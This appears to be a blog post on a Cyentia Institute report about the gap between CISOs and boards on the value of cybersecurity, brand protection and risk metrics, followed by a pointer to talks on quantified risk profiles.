The explanation from Cyentia on this point is worth noting: “CISOs of course knows that data protection lies in their purview … and so they’ve learned to position data protection as a business enabler than a cost center.”

I think what Cyentia is getting at is that CSOs feel strongly that they bring real value to their business and not just red ink — not just a data protection service. And that jibes with the fact that 40% of CSOs say they are business enablers, although that belief is not shared equally by the board — only 20% of them think that.

The key to all this is the difference in the breakdown on the “brand protection” value: over 60% of board members saw this as important, but it barely made a blip with CSOs, at less than 20%.

I’m not surprised that CSOs don’t see their job as being the brand police. I don’t necessarily blame them. I can almost hear them screaming “I’m an IT professional not a brand champion.”

But let’s look at this from a risk perspective, which is the viewpoint of CEOs and boards. As one of the board-level interviewees put it in the report, their biggest concern is the legal and business implications of a data breach. They know a data breach or an insider attack can cause serious reputational damage, leading to lost sales and lawsuits, which all work out to hard dollars. Brand damage is very much a board-level issue!

Ponemon, of course, has been tracking both the direct and enormous indirect costs involved in breach incidents with its own reports over the years, and recent news only adds to the evidence.

Cyentia has identified an enormous gap between what CISOs and boards think is important regarding the value of cybersecurity. This leads nicely to another of their results, related to security metrics.

Let’s Talk About Risk

The metric measurements in the report (see section 4) are also revealing and detail more of this diverging viewpoint. Of course, CSOs are focused on various IT metrics, particularly related to security incidents, responses, governance, and more.

Now that’s a disparity! CSOs underplay the importance of risk. (Source: Cyentia Institute)

Cyentia tells us there’s a rough balance between the two sides on many of the IT metrics. However, there’s a large gap between CISOs and boards over the importance of “risk posture” metrics: it’s mentioned by 80% of boards versus only 20% of CSOs. That’s a startling disparity.

What gives?

IT loves operational security metrics: the ones mentioned above along with lots of details about day-to-day operations, involving patching status, malware or virus scanner stats, and more.

But that’s not what board members, who may not be as technically knowledgeable in a narrow IT sense, think is important for their work!

These folks have enormous experience running actual businesses. CEOs and their boards, of course, need to plan ahead, and these savvy business pros expect there to be uncertainty in their plans. That comes with the territory.

What they want from IT is a quantification of how bad the outcome of a breach, insider attack, or accidental disclosure can get in dollars, and the frequency or probability of these events happening.

You can think of them as disciplined high-tech gamblers who know all the probabilities of each outcome and place their bets accordingly. Pro tip: they’re probably great poker players.

For Next Time

If you want to get ahead of the game, take a look at Evan Wheeler’s presentation at this year’s RSA conference. Evan is a CISO and risk management expert. If you want to understand what a risk profile is, check out his explanation at around the 25-minute mark.

His key point is that business leaders are interested both in rare cybersecurity events that incur huge losses – think Equifax – and in more likely events that typically have far lower costs – spam mail, say, to get corporate credit card numbers used in the travel department. They have different ways of dealing with each of these outcomes.

We’ll get a little more into the weeds next time when we look at “exceedance probabilities”, which is basically a more quantified version of a risk profile. It’s a great topic, and one that CSOs should become more familiar with.

There are other interesting stats in the Cyentia report – blow your mind by perusing the chart showing different perspectives on security effectiveness. I urge you to download it for yourself and spend time mulling over the fine points. It’s well worth the effort.